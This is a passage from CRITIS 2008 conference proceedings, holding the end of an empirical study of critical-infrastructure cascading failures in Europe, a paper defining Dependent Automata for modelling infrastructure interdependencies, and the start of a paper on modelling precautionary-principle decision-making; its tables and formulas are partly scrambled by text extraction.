Fixed telecom Mobile Telephony
Backbone
# events Energy
Oil
Gas
Electric Power
Affected Sector
Cable CATV
Telecom Sector (excl. Internet)
Energy Sector
33% 81% 1% 4% 19% 75% 40% 3% 69% 80% 27%
1 0 65 2% 2 5 8% 50% 15 3 0 17 3% 3% 23% 8% 14 11 6% 6% 2 12 13 20% 12% 23% 27 0 0 49% 1% 62 7% 2% 32% 3% 1% 57 76% 1% 1% 98 2% 2% 5 78% 14 0 59% 1% 1% 60% 4% 2% 16% 2% 0% 24% 294 4 4 302 22 11 78 10 1 122
Table 5. Categorisation of number of CI events (# of events CI sector to sector) Initiating Sector Education Energy Financial Services Food Government Health Industry Internet Postal Services Telecom Transport Water Total
Avg. # of resulting Sample Avg. # of resulting Sample events if cascading size events from all events size 2.06 3.00 1.00 1.00 2.20 1.20 1.00 1.86 1.26 1.67 1.88
0 146 1 0 2 1 5 15 1 69 19 9 268
0.00 0.51 0.05 0.00 0.03 0.03 0.37 0.11 0.11 0.43 0.06 0.20 0.29
4 590 60 8 67 39 27 160 1 295 422 76 1749
5 Conclusions Our findings raise several important issues. First, while the current literature gives very little clues as to the probability of cascading failures, our empirical data suggests that
Empirical Findings on Critical Infrastructure Dependencies in Europe
309
such cascades are in fact fairly frequent. This forms a sharp contrast with the typical examples of events of low probability and high consequence that are often presented as evidence of the urgency of dealing with CI dependencies. Second, they question the validity of the Domino Theory of CI. While there are an almost unlimited number of dependencies and interdependencies among CI possible, i.e., there are many pathways along which failures may propagate CI sector boundaries, we found that this potential is not expressed in the empirical data on actual events. The cascades that were reported were highly asymmetrical and focused. The overwhelming majority of them originated in the energy and telecom sectors. This is not unexpected, but what is new is the fact that so few cascades took place in other CI sectors. Third, interdependencies far less occur than analysts have consistently modelled. We found only two cases on a total of some 770 CI failures. In short, while dependencies and interdependencies exist everywhere, they rarely appear to be strong enough to trigger a reported serious cascading CI outage. It is unclear whether this is because the CI operators manage the (inter)dependencies effectively or because the dependencies are not that powerful to begin with. In any case, it seems that CI are either more loosely coupled than the Domino Theory suggests, or that the CI dependencies occur at a more technical level not becoming visible to news reports. Of course, there are a couple of qualifications that go with this conclusion. First of all, our findings do not rule out the possibility of multi-sector failure, i.e., we still face the possibility of scenarios of low probability and high consequence. Second, even if the Domino Theory is misleading, that does not negate the fact that damages resulting from cascades initiated by the energy and telecommunication sectors can be substantial. The third implication of our analysis is that it does not support the idea that CI dependencies are the unmanaged challenge. While there is an intuitive appeal to this idea, it may in fact be a myth. If we assume a vast web of dependencies that can trigger cascades, then it seems inevitable that we end up with a shortfall in the governance of this risk. But the evidence suggests that even if we assume this shortfall to exist, it does not translate into frequent deep cascades. Dependencies seem to be anything but unmanaged. Nevertheless, governance is needed. For instance, the high reliability of electricity and other CI services is anything but guaranteed in Europe. Moreover, the CI sectors that depend on the energy and telecom sectors can improve their strategies to manage those dependencies. In sum, the sobering conclusion emerges that CI cascading dependencies are focused to a limited number of CI sectors, occur more frequently than expected, and do not often cascade deeply.
Acknowledgement The research described above was partly funded by the EU Commission as part of the 6th framework programme project IRRIIS under contract number FP6-2005-IST4 027568 and partly under the Dutch Next Generation Infrastructure (NGI) research programme.
310
E. Luiijf et al.
References 1. European Commission, Proposal for a Directive of the Council on the identification and designation of European Critical Infrastructure and the assessment to improve their protection, COM (2006) 787 final, Communication from the Commission to the Council and the European Parliament, Brussels (December 12, 2006) 2. Auerswald, P.E.: Complexity and Interdependence: The Unmanaged Challenge. In: Auerswald, P.E., Branscomb, L.M., La Porte, T.M., Michel-Kerjan, E.O. (eds.) Seeds of Disaster, Roots and Response: How Private Action can Reduce Public Vulnerability, Cambridge, p. 157 (2006) 3. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research (2006) 4. Rinaldi, S.M., Peerenboom, J., Kelly, T.: Complexities in identifying, Understanding, and Analyzing Critical Infrastructure Dependencies. Special issue IEEE Control Systems Magazine on Complex Interactive Networks (December 2001) 5. Simonoff, J., Restrepo, C., Zimmerman, R., Naphtali, Z.: Analysis of Electrical and Oil and Gas Pipeline Failures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection. IFIP WG 11.10 series in Critical Infrastructure Protection (2008) 6. Svendsen, N.K., Wolthuysen, S.D.: Connectivity models of interdependency in mixed-type critical infrastructure networks. Information Security Technical Report 12(1), 44–55 (2006) 7. Zimmerman, R., Restrepo, C.: The next step: Quantifying infrastructure interdependencies to improve security. International Journal of Critical Infrastructures 2(2-3), 215–230 (2006) 8. Von Kirchbach, H.-P., et al.: Bericht der Unabhngigen Kommission der Schsischen Staatsregierung Flutkatastrophe 2002 (2003) 9. UCTE, Final report System Disturbance on 4 November 2006, UCTE (2006), http://www.ucte.org/library/otherreports/ Final-Report-20070130.pdf 10. ENSAD database, source, http://gabe.web.psi.ch/research/ra (last visited: July 29, 2008)
Dependent Automata for the Modelling of Dependencies Susanna Donatelli Dipartimento di Informatica, Universit` a di Torino, Torino, Italy
[email protected] Abstract. As far as we know there is not a definition of dependency in a formal setting: to fill this gap we propose in this paper a state based formalism called (network of) Dependent Automata, that consider dependencies as central elements. When used for modelling interdependencies in critical infrastructures, each infrastructure is modelled as a Dependent Automaton, that accounts for local behaviour and for dependencies from and to other infrastructures, while the whole system is obtained by composition of the automata of the infrastructures considered.
1
Introduction
Interdependency and infrastructures interdependencies have become popular terms in recent years, drawing a significant amount of interest from researchers and governamental agencies, especially after the power crisis in North America [15] and big infrastructures disruptions like the one caused by the Italian blackout of 2003 [19]. The seminal work of Rinaldi, Peerenboon and Kelly [18] identifies six dimensions in the critical infrastructure interdependency space, one of which, the type of failure, is the one we concentrate upon in this paper. Studies of critical infrastructures make use of either graph models, equations, complex adaptive systems [12] and agent models: an extended survey of some of the approaches and tools can be found in [14,10,9]. In graph-based approaches (as in [18,3,13]) each infrastructure is a node, dependencies are arcs, and an arc (i, j) expresses the operational dependency of j upon i, possibly quantified according to some metrics (usually a probability or a delay in quantitative approaches), and the analysis studies the effect of the failure of a node (one infrastructure) on the rest of the system. Similar objectives have the studies based on mathematical equations, like the ones inspired by Leontief economical model [5]: when applied in the infrastructure analysis context, each infrastructure is seen as an inputoutput node that takes a number of input variables that represent the operability of the other infrastructure from which it depends, and elaborates new values of the operability it offers to other infrastructures, expressed as value for its output variables. Agent-based models (as in [20]) model the system as a set of agents:
This work has been supported by the European project CRUTIAL (Critical Utility InfrastructurAL resilience) IST-FP6-STREP-027513.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 311–318, 2009. c Springer-Verlag Berlin Heidelberg 2009
312
S. Donatelli
agents can “sense” changes of state in the system and react according to metaknowledge to simulate the effect of state change. The approach we take in this paper is instead “microscopic”, and can be seen as complementary: we consider two infrastructures that heavily depend one from the other, model them using automata, which allow for an arbitrary level of detail in the description of the infrastructure behaviour, and we study a formalism that allows to specify how one infrastructure (automaton) depends on the other (and viceversa). The aim of our investigation is to find a formal settings in which models whose behaviour depends on other models can be represented, and in which the three types of failures considered in critical infrastructure interdependencies (cascading, escalating and common-cause failures [18]) can be adequately and precisely described. A cascading failure occurs when a disruption in one infrastructure causes the failure of a component in a second infrastructure, which subsequently causes a disruption in the second infrastructure [18]. This definition was slightly simplified in [17]. An escalating failure occurs when an existing disruption in one infrastructure exacerbates an independent disruption of a second infrastructure, generally in the form of increasing the severity or the time for recovery or restoration of the second failure [18]. Finally, a common-cause failure occurs when two or more infrastructure networks are disrupted at the same time: components within each network fail because of some common cause [18]. The conceptual underlying hypothesis of this work is that, to be able to describe (inter)dependencies between components, and to be able to capture cascading/escalating and common-cause failure, we need a language that allows us to discriminate causes and effects, and in particular local causes (inside a component) from global causes (from outside a component), and local effects (to the component itself) to global effects (to other components). To be able to describe causes and effects we have placed our research in the context of automata, in particular the formal setting we have devised consists of a network of automata: each infrastructure is modelled as a single automaton, and the whole system is described by the composition of the automata. For the time being, mainly for notational and conceptual simplicity, we concentrate on two infrastructures only. The states of the automata are labelled with set of propositions, like, for example, up, down, failed, partially-failed, and appropriately decorated to account for severity of the state with respect to system functionalities. Transitions in the automata (edges) are decorated with actions. The change of state in one automaton has been enriched to model both endogenous causes (the action associated to the arc), and exogenous ones (a state transition in one automaton can depend on the state of another automata, and/or can provoke a change of state in another automaton). This work has been developed in the context of the EEC-IST project CRUTIAL [1]: in the project DA have been used to model the interdependencies of the Electrical and Information Infrastructures described in [11]. Although DA have been developed in the context of critical infrastructures, the formalism is more general, and we shall freely mix the terms infrastructures and systems.
Dependent Automata for the Modelling of Dependencies
2
313
Dependent Automata
We consider two systems, generically named A and B . We can classify the cause of a modification in a system as being either local(A): a state transition in A depends on A only; depend(A,B ): a state transition in A can depend on B being in a well defined state. The effect provoked by a cause can be: local (on A only), or global (on A and B ). A separate case is synchronization: synch(A,B ), when A and B evolve through the same common action: this may actually correspond to a real common action, or to a level of abstraction in which we do not want to state whether the action pertains to A or B . so that is impossible to say We have combined these behaviours into Table 1, to get the following classification (seen from A viewpoint): LC-LE LocalCause, Local effect: a change of state in A is triggered by an event of A itself, and its effect is confined in A, LC-GE LocalCause, Global effect: a change of state in A is triggered by an event of A itself, and its effect provokes also a change of state in B GSC-LE GlobalStateCause, Local effect: a change of state in A depends on the state of B , but its effect is confined in A GSC-GE GlobalStateCause, Global effect: a change of state in A depends on the state of B , and its effect provokes also a change of state in B GA GlobalAction: there is an event that is common to the two infrastructures (or it is modelled as common to the two infrastructures). Table 1. The cause-effect combinations cause\ effect local(A) depend(A,B) A only LC-LE LC-GE A and B GSC-LE GSC-GE Synch(A,B) GA
We can now introduce Dependent Automata and their composition. Definition 1. An automaton A, dependent upon the set of states SB of an automaton B , is defined by the tuple: A = (SA , sA , EA , SEA , LA ) where – SA is the non empty and finite set of states – sA ⊆ SA is the initial state – EA ⊆ SA × SA × ActA × P(SB × SB ) is the set of edges (ActA is the set of Actions of A and P(SB × SB ) is the power set over pairs of states of B ) – SEA : SA → [0, 1] is the severity function of states, with 1 being the greatest severity – LA : SA → P(APA ) is the labelling of states over a set of symbols APA LA is used to classify states in classes The set of actions ActA allows to distinguish systems events from changes of state, as the same action can be associated to more than one edge.
314
S. Donatelli
We represent an arc from a state a to a state a of action α and effect ef as: α,ef
(a) −−−→ (a ), where ef ∈ P(SB × SB ) is called the “effect relationship”, and f rom(ef ) (to(ef )) are the set of states that appear as first (second) element in α,ef
the pairs in ef . When considered in isolation, the arc (a) −−−→ (a ) indicates that, upon action α, automaton A can move from a to a . When considered in composition with B , it means that upon action α, automaton A can move from a to a , if, at the same time, automaton B is in a state b ∈ f rom(ef ). As a consequence of the change of state in A, also B will move from b to b , for (b, b ) ∈ ef . This semantics “implements” a concept very similar to test&set: an action α of A can take place only if B is in a given state (test) and it realization modifies the state (set), that is to say, the value that has been tested. The formal semantics of a set of interacting dependent automata is defined through the composition operator ||, as follows. Definition 2. Given two Dependent Automata A = (SA , sA , EA , SEA , LA ), that depends on a set of states SB of an automaton B , and B = (SB , sB , EB , SEB , LB ), that depends on a set of states SA of automaton A, we define the composition of DA over the set Synch ⊆ ActA ∩ ActB the automaton Sys = A||Synch B, with Sys = (S, s, E, SE, L) and: – S = SA × SB is the set of states – s = (sA , sB ) is the initial state α – E ⊆ S × S × Act, and there is an arc (a, b) − → (a , b ), if α,ef
• α ∈ Synch and ∃ (a) −−−→ (a ) ∈ EA , with (b, b ) ∈ ef OR ef
• α ∈ Synch and ∃ (b) −→ (b ) ∈ EB , with(a, a ) ∈ ef OR α,∅
α,∅
• α ∈ Synch, and ∃ (a) −−→ (a ) ∈ EA , and ∃ (b) −−→ (b ) ∈ EB , where ∅ is the empty set. – SE: S → [0, 1] with SE(a, b) = min{SE(a), SE(b)} – L: S → APA × APB , with L(a, b) = (L(a), L(b)) Note that || is the parallel operator of Communicating Sequential Processes (CSP) [7] when α ∈ Synch, and it is an extended version of the interleaving composition of CSP to include effects of one automaton (process in CSP) other another one, when α ∈ Synch. DA make use of a single construct to express not only dependency, but also classical features of distributed systems like concurrent behaviour and non α,ef determinism, as, indeed, in (a) −−−→ (a ): – if ∃ [b, b ] ∈ ef and [b, b”] ∈ ef , with b = b”, then there is a non deterministic α,ef
effect of (a) −−−→ (a ) over B ; – if ef is empty, A cannot evolve with α – if ef = Id, with Id = b∈SB [b, b], then A can evolve independently of B .
Dependent Automata for the Modelling of Dependencies
315
As for their name, by default the behaviour of a DA depends upon the behaviour of the other automaton. To favour the definition of automaton in isolation, that is to say when SB is unknown or may vary during the specification process, we can enrich the syntax of the effect relationship to allow for an Identity notation Id (pairs of equal states) for any state of SB , even if SB is not fully known, and a Complement notation Compl, that adds identity pairs for all whose elements of SB that are not included in f rom(ef ). We can therefore extend the definition of effect as follows: ef = ef ∪ IdB
and ef = ef ∪ ComplB (ef )
with
– IdB = ∪b∈SB [b, b], and – ComplB (ef ) = {[b, b], ∀b|no pair [b, b ] ∈ ef }, that can be also defined as: Compl = IdB \ f rom(ef ) × f rom(ef ). The definitions are given in the context of A (so the effect is defined on the states of B ), but same applies for B . From a behavioural point of view, the integration of IdB into the effect of an arc from a to a ensures that the automaton can take the arc independently of the state of the other automaton, while the integration of the Compl function also ensures that the automaton can always follow the arc, but not necessarily in an independent manner. It is obvious that if ef is the empty set, then Compl = Id. Figure 1 shows a small example of two DAs composed into a third one (with no sunchronization action since their semantics is standard): in the figure arcs have been numbered for ease of reference. Note the use of the notation Id and Compl and their consequences on the composition: action α on arc 1 can take place in the composition whenever the A component of the state is a, and it does not change the B component of the state (LC-LE type); action β on arc 2 instead can always take place when the A component of the state is a, but it may or may not change the state of b, depending on the state of B itself (LC-GE type); action δ on arc 3 can instead take place only if A is in state a, and as a consequence A moves to a (GSC-GE type), while arc 4 of B can be taken only if A is in a and a”, but not in a, and the state of A is left unchanged (GSC-LE).
a"
2:β, [b,b’] +Compl
a
1: α, Id
a’ a,b
a",b γ
β
δ
3: δ, [a,a’]
b
b’
a",b’
β
α
a,b’
α
4: γ, [a’,a’]+[a",a"]
Fig. 1. Two DAs (left) and their composition (right)
a’,b γ
a’,b’
316
3
S. Donatelli
Modelling Dependencies in the DA Model
Let us now discuss how the four combinations of local and global causes and effects given in Table 1 can be modelled in DA using the instrument of the effect relationship associated with the arcs. With reference to an arc of action α and effect ef in an automaton A that depends upon a set of states SB , we can observe that the arc describes a local cause if ef is a total relation (that is to say, f rom(ef ) = SB ): indeed the arc can be taken independently from the state of B . The arc describes instead a global cause if ef is not a total relation ( f rom(ef ) ⊂ SB ), since it can be taken or not depending on the the state of B . The arc represents a local effect if ef ⊆ Id (no change of state in B occurs), while it represents a global effect if not(ef ⊆ Id) When combining causes and effects we get four mutually exclusive classes, therefore each arc can be classified based solely on the value of the effect relationship ef as summarized in Table 2 where α ∈ Synch; the arc is GA if α ∈ Sunch. We get the following combinations: – LC-LE: if α ∈ Synch and ef = Id, – GSC-LE: if α ∈ Synch and ef = Id ⊆ Id; indeed the automaton can follow the arc only if the other automaton is in a given subset of states; the change of state induced by the arc has no effect on the other automaton – LC-GE: if α ∈ Synch and ef is a total relation and ef = Id; indeed the automaton can take the arc independently of the state of the other automaton (since ef is a total function); the change of state induced by the arc has an effect on the other automaton (since ef is different from Id) – GSC-GE: if α ∈ Synch and ef is characterized by F rom(ef ) ⊂ SB (ef is not a total function) and ∃[b, b ] ∈ ef with b = b – GA: if α ∈ Synch Table 2. The cause-effect behaviour based on the effect relationship ef cause\ effect local(A): ef ⊆ Id dependent(A,B ): not(ef ⊆ Id) A only: LC-LE: LC-GE: f rom(ef ) = SB ef = Id f rom(ef ) = SB and ∃[b, b ] ∈ ef, b = b A and B : GSC-LE: GSC-GE f rom(ef ) ⊂ SB ef ⊂ Id f rom(ef ) ⊂ SB and ∃[b, b ] ∈ ef, b = b
Finally, let us discuss why a new class of automata was needed, considering the richness of the formalisms already defined in the literature. Indeed we could not find a formalism in which dependency was a primitive concepts: many, like Statecharts [6], allow one event to cause an action, and in general allow to modify a global variable, and the other automaton to test the value of the variable, but the dependency is not direct so no direct cause-effect can be explicitly represented. Statecharts as defined in UML do allow, through a complex chain of event, action and trigger modelling elements defined in the metamodel, a change
Dependent Automata for the Modelling of Dependencies
317
of state in one state machine to change the state of another state machine, but, again, the relation is far from direct. The work in [16] proposes instead a formalism based on a structure of “occurrence nets” (a variant of Petri net with concurrency but no choice), well suited to represent executions, and considers the problem of detecting, also using Petri net synthesis results, chains of fault, error, and failure in an existing model (that may be the global model of one or more infrastructures). In this sense the approach is complementary to what this paper proposes.
4
Conclusion
In this paper Dependent Automata have been proposed as a reference model to classify dependencies in a formal setting. The technical report in [2] describes how cascading, escalating, and common-cause failures can be defined in a formal way. In the same report it is shown an application to the case of the Electrical and Information Infrastructure models described in [11]. This example, nevertheless, does not constitute a sufficient assessment of the formalism, not only for the obvious reason that it is just a single case, but mainly because the infrastructure behaviour was already described using automata, therefore with the same state/transition approach to specification that we are considering. We shall continue the applicability study using the scenarios (description of relevant behaviour) that have been defined in the CRUTIAL project( [1]- final deliverable of Workpackage 1), and we plan to get scenarios that involve other infrastructures: a good starting point could be the work done inside IRRIIS [8] and other projects on critical infrastructure interdependencies. The implementation of a graphical interface for DA specification and composition has been recently completed inside the modelling framework DrawNET [4]. A useful feature of the implementation of DA that we plan for the future is to provide syntactic checking for arcs: the four types of arcs are distinguished, for example using colours, and DrawNET could link to each arc a function that checks whether the effect relationship associated to the arc satisfy the constraints of Table 2.
References 1. CRUTIAL project (CRitical Utility InfrastructurAL Resilience EEC project ISTFP6-STREP-027513), http://crutial.cesiricerca.it 2. Workpackage 2, Year 2 Final Deliverable of the CRUTIAL project, http://crutial.cesiricerca.it 3. Dobson, I., Carreras, B.A., Newman, D.E.: A probabilistic loading-dependent model of cascading failure and possible implications for blackouts. In: 36th Hawaii International Conference on System Sciences (HICSS-36), p. 65 (2003) 4. Gribaudo, M., Raiteri, D.C., Franceschinis, G.: Draw-net, a customizable multiformalism, multi-solution tool for the quantitative evaluation of systems. In: QEST, pp. 257–258. IEEE Computer Society, Los Alamitos (2005)
318
S. Donatelli
5. Haimes, Y.Y., Jiang, P.: Leontief-based model of risk in complex interconnected infrastructures. Journal of Infrastructure Systems 7(1), 1–12 (2001) 6. Harel, D.: Statecharts: a visual formalism for complex systems. Science of Computer Programming 8(3), 231–274 (1987) 7. Hoare, C.A.R.: Communicating sequential processes. Communications of the ACM 21(8), 666–677 (1978) 8. IRRIIS project (Integrated Risk Reduction of Information-based Infrastructure Systems, EEC-IST project 027568, http://www.irriis.org 9. Interdependency Taxonomy and Interdependency approaches, deliverable D2.2.1 of IRRIIS project, http://www.irriis.org 10. Tools and techniques for interdependency analysis deliverable D2.2.2 of IRRIIS project, http://www.irriis.org 11. Laprie, J.-C., Kanoun, K., Kaˆ aniche, M.: Modelling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007) 12. Little, R.G.: Toward more robust infrastructure: Observations on improving the resilience and reliability of critical systems. In: 36th Hawaii International Conference on System Sciences (HICSS-36), p. 58 (2003) 13. Nedic, D.P., Dobson, I., Kirschen, D.S., Carreras, B.A., Lynch, V.E.: Criticality in a cascading failure blackout model. In: 15th Power Systems Computation Conference (August 2005) 14. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency modelling: A Survey of U.S. and International Research. Idaho National Laboratory Critical Infrastructure Protection Division (August 2006) 15. Performance Evaluation group of University of Torino. The GreatSPN tool, http://www.di.unito.it/~ greatspn 16. Randell, B., Koutny, M.: Failures: Their definition, modelling and analysis. In: Jones, C.B., Liu, Z., Woodcock, J. (eds.) ICTAC 2007. LNCS, vol. 4711, pp. 260– 274. Springer, Heidelberg (2007) 17. Rinaldi, S.M., Peerenboom, J.P., Fisher, R.E., Kelly, T.K.: Studying the chain reaction. Electric Perspectives, 22–31 (Janurary/February 2002) 18. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control System Magazine, 11–25 (December 2001) 19. Sforna, M., Delfanti, M.: Overview of the events and causes of the 2003 italian blackout. In: IEEE Power Systems Conference and Exposition, PCSE, November 2006, pp. 301–308 (2006) 20. Tolone, W.J., Wilson, D., Raja, A., Xiang, W.n., Hao, H., Phelps, S., Wray Johnson, E.: Critical infrastructure integration modeling and simulation. In: Chen, H., Moore, R., Zeng, D.D., Leavitt, J. (eds.) ISI 2004, vol. 3073, pp. 214–225. Springer, Heidelberg (2004)
Application of IPK (Information, Preferences, Knowledge) Paradigm for the Modelling of Precautionary Principle Based Decision-Making Adam Maria Gadomski1 and Tomasz Adam Zimny2 2
1 Interuniversity Centre ECONA and Italian Research Agency ENEA, Italy Institute of Legal Studies, Polish Academy of Sciences, Poland, Phd candidate
Abstract. The aim of the article is modelling of the decision-making, in which Precautionary Principle (PP) is applied. Decisions are often made under time constraints, in lack of proper information, preferences or knowledge (IPK). Since application of PP usually bears additional costs, it should be applied only when more efficient risk management policies are unavailable. Presented d-m framework based on the IPK conceptualization allows identification of PP application criteria and models PP as a decisional rule, which is usually applied when the potential threat is recognized, while the risk is not computational, or its assessment is not economically motivated. The proposed model uses the TOGA (Top-down Object-based Goal-oriented Approach) methodology as a modelling tool.
1
Introduction
Decision-making (d-m) is a complex process, particularly in case of risk management. One of important and extreme decisional rules applied in d-m is the Precautionary Principle (PP). In general, it advises to take measures aimed at avoidance or diminishing negative effects of human-independent events or unintended consequences of human decisions, when the probability of their occurrence or severity, is uncertain. It means when the risk is not calculable (COMEST [3]). A socio-cognitive model of d-m under possible high-risk conditions and its components are important knowledge for the managers, for coping with organization vulnerability, as well as for the designers of computerized decision-support systems. In the socio-cognitive engineering context (Gadomski [8])), this article is aimed at the modelling of Precautionary Principle (PP) application in complex managerial d-m during risk/emergency management. Although PP has been applied for many years, an approach to its definition was only done recently, and from the very intuitive legal point of view. PP started entering legal acts in the 1970s (COMEST [3]) since then it was formulated both in law and in doctrine (Cranor [4]) in different versions. Recently, it has been described multiple times and often it was criticized (Peterson [17]), however, it was not yet modelled from the cognitive systemic perspective. In this work, PP is seen as a directive in d-m reasoning. Decision-makers act also at a very high (political) level (Ezell [5]). However, protection of infrastructure elements remains a responsibility of organizations, R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 319–327, 2009. c Springer-Verlag Berlin Heidelberg 2009
320
A.M. Gadomski and T.A. Zimny
who own them and their employees (individual decision-makers) (Jones [16]). Risk management has to be part of overall management of an organization (Haimes [13]).Some authors stressed a need to improve understanding of commonalities and differences between various fields, in which risks are managed (Haimes [14]). Since there are many versions of PP, as well as many legal approaches to the concept of risk itself, the main goal of this work was to propose a computational modelling framework describing when PP could be applied and the way of its domain-specific specialization. This task requires distinguishing of the classes of situations where PP is suggested, and a sufficient formalization of the PP rule in the decisional context. The model is constructed using to the Top-down Object-based Goal-oriented Approach (TOGA) meta-theory. The specific socio-cognitive property of this approach is the assumption of the perspective of a concrete intelligent agent (individual or group of intelligent beings) IA, which is involved in a given intervention-oriented d-m in a pre-selected domain of his/its activity D.
2 2.1
TOGA Modelling Framework and Main Concepts The TOGA Meta-theory Assumptions
The TOGA meta-theory, as a meta-knowledge conceptualization tool, has been applied to the knowledge ordering in several identification and specification complex, interdisciplinary problems (Gadomski [6]), (Gadomski et. al. [10]), (Gadomski [7]), (Gadomski [9]). It is based on the set of: top-axioms, modelling paradigms, top-models and a top-down goal-oriented methodology. In this work we need to integrate identification and specification perspective (where identification relates to existing objects and specification is focused on the design of not yet existing systems/processes), because, on the one hand we recognize a real decisional situation and on the other, we propose a concert structured modelling process. The fundamental feature of TOGA is the assumption and application of a common conceptualization bases for the reciprocal comprehension of problem modellers. They may represent different branches, and their initial view on the same problem, non congruent competences and interests may be essentially different, also when they have the same goal and a systemic terminological knowledge. Therefore this situation requires initially a basic consensus defined on a very high problem generalization level. In the next steps, TOGA allows to zoom and view various goal-oriented aspects of a problem in detail. On every layer the model has to be congruent and complete. Because of its top-down and goal-oriented approach, TOGA enables to incorporate different local methodologies and specialized methods from psychology, sociology and artificial intelligence in the problem identification task. In this article we shortly present only selected necessary properties of this conceptualization scheme.
Application of IPK (Information, Preferences, Knowledge) Paradigm
2.2
321
Environment, Domain of Observation, Domain of Activity
The application of the TOGA approach begins from the top recognition of the couple (abstract intelligent agent (AIA), environment) and their interactions. The couple is called intelligent agent world (IA world). Its components are successively decomposed and specialised for every given specific problem. 2.3
Information, Preferences, Knowledge
The generic reasoning function of abstract intelligent agent (AIA), is called Universal Reasoning Paradigm and is modelled by the cognitive information processing which is funded on three key concepts: information, knowledge and preferences . They are well distinguished but relative, it means AIA and D dependent, and have the properties of abstract objects. Information (I) are data which have a meaning and represent a specific property of a preselected domain of human or artificial agent’s activity. Knowledge (K) is every abstract property of human/artificial agent which has ability to process or transform (quantitatively/qualitatively) information into other information (for example, a model, procedure, instruction). Preferences, (P ) are ordered relations among two states of the domain of activity of the agent. They indicate a state with higher utility. Preference relations serve to establish an intervention goal of an agent, and, in consequence for the choice of a proper knowledge. The fundamental reasoning frame is constructed using independent objectbased transformations related to the preselected domain of a possible intervention. On the meta-level, preferences base P B and knowledge base KB from the domain level become successively new domain of activity, where P and K are considered new I, and the same recursive operations can be repeated. The preferences can be represented as an oriented graph, and allow the agent to select his goals, as the domain states with a maximum level of utility (= max. preference). Within the IA world, an agent can execute actions aimed at achieving goals. The achievement of a goal relies either on the inducing of a requested change within the agents domain of interest, or preventing certain changes. For example, in the case of LCCIs (Large Complex Critical Infrastructure) (Bologna, [2]), the goal is usually to maintain a continuous supply of services (Bingham, J., [1]), hence agents actions would be usually aimed at making sure that changes, which would disturb the services providing process, do not occur. The request of an action which has to be aimed at achieving a goal is called a task.
3
Decisional Framework and PP Application Criteria
A Precautionary Principle is a specific rule which is used in d-m. In general, an action-oriented d-m is goal-oriented and it can be represented as a situation recognition and a decisional rule. In order to apply PP the agent has to recognise a specific situation (S) as a situation requiring the application of PP (S p ) and perform a certain action (A), which will be a precautionary action (Ap ). From
322
A.M. Gadomski and T.A. Zimny
the perspective of decision-maker S p recognition and Ap choice/elaboration are relative and depend on his I,P ,K (it means, S p depends on IP K and Ap depends on IP K) related to the IA world, i.e. to its components. Acquisition, evaluation and application of new IP K during a d-m are essential activities for the recognition of when and how PP should be used. Our objective is to recognise classes of S, A, characteristic for PP. It means with such attributes and values which are critical for the choice of PP. S p and Ap relate to a concrete IA as a decision-maker and to his/its IPK related to a given domain of activity. (See Gadomski, Zimny, [11] for details)
4
Decomposition of Decision-Making Process
We decompose the generic d-m process using the general IP K framework, in order to determine, where in its course PP may appear. Let us divide d-m on the following phases: reception of I, situation assessment, evaluation of I and K, making a decision. A single branch of this scheme is presented on Fig. 1. Reception of information about an event: If the agent doesnt perceive a possibility of occurrence of an event, no reaction to alleged consequences of this event can occur. Reception of I about event has been presented at level 1 on Fig. 1. If the agent perceives a possibility of occurrence of an event, he can still be in a position of ignorance, as to the consequences of the event and whether these consequences are tolerable or not. The I 0 on the scheme denotes any new information, the agent receives. Thus, the scheme can depict a situation in which no losses are generated (a neutral situation) and an emergency situation, where the emergency manager receives new I, relevant in his situation. Situation assessment: The situation assessment stage is presented at the level 2 on Fig. 1 and in detail on Fig. 2. At the current stage of d-m the agent uses his K to process newly gained and already possessed I. In order to model or assess risk to an infrastructure the agent has to know the infrastructures state variables (Haimes [15]). Here, the agent determines the current state of his domain and predicts its future states. This stage consists of following stages Processing of information with static model knowledge, acquisition of information, about possible current domain states: Agents I is transformed with mK, which results in information about his domain of interest. The accuracy and precision of domains description depend on agents IK. Also since agent may possess different models, he may get different domain descriptions. Processing of information with dynamic model knowledge, acquisition of information about possible future domain states: At this stage, the agent, basing on his mK and I, predicts what states will his domain of observation take. Depending on his situation the agent can interpret this I in different ways or be unable to make predictions at all. After the agent has determined the alleged present and future states of his domain, he evaluates possessed information.
Application of IPK (Information, Preferences, Knowledge) Paradigm
323
Fig. 1. Scheme of a single branch of generic IPK-based d-m function
Evaluation of possessed information and knowledge from the point of view of agents preferences: Next stages (Fig. 1, level 3) of d-m amount to evaluation of the content of I and K about the expected event, and also to the evaluation of the quality and amount of I and K. These processes result in decisions about application of protective measures or decisions aimed at acquisition of additional I or K. This stage contains following sub-stages: Evaluation of the content of information. Agents P indicate states of higher and lower utility. The agent compares the predicted states of his domain of interest with the states indicated by P . If the predicted state is below a certain level of agents tolerance, then an event that may cause this state is considered risky. Evaluation of the amount of information. The amount of I received may be too small to identify a possible state of the domain of interest. Processing of such a set of I may result in omitting some of possible consequences. The problem applies to the amount or quantity of possessed I. Whether the I and K are sufficient, the agent decides on the basis of his P . In particular, the agent does not need to gather the maximum amount of I available. Furthermore, in order to make a decision, the agent does not need to identify all the states of domain in which he loses are generated. Usually, it satisfies him, that the class of unfavourable is much bigger than the class of winning states.
324
A.M. Gadomski and T.A. Zimny
I0 (Information event)
Static models processing
M
about
1 s
M
IMs11…….IMs1n
Dynamic models processing
M
n s
IMs31…….IMs3n
1 d
n
Md
IMd11…….IMd1n
…………..
Evaluation of total information about possible consequences
IMd31…….IMd3n
Legend: I0 – new information obtained by the agent Mns – static models used to process information IMsnm – information obtained due to processing of information with static models Mnd – dynamic models used to process information IMdnm – information obtained due to processing information with dynamic models
Further decision making stages
Fig. 2. A detailed scheme of the situation assessment stage in decision-making
